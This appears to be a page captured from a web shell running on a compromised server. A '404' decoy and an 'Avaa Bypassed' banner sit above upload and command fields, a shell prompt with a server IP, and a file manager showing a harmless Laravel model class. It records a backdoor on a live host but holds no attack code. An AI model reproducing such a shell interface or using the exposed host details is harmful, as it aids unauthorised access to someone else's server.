404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.129.70.153: ~ $
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class NewsPodcasts extends Model
{
    use HasFactory;

    protected $fillable = [
        'type', 'thumbnail', 'title', 'description', 'audio_file', 'video_file'
    ];
}

Filemanager

Name Type Size Permission Actions
Admin.php File 955 B 0644
Image.php File 366 B 0644
NewsPodcasts.php File 299 B 0644
Reminder.php File 526 B 0644
User.php File 916 B 0644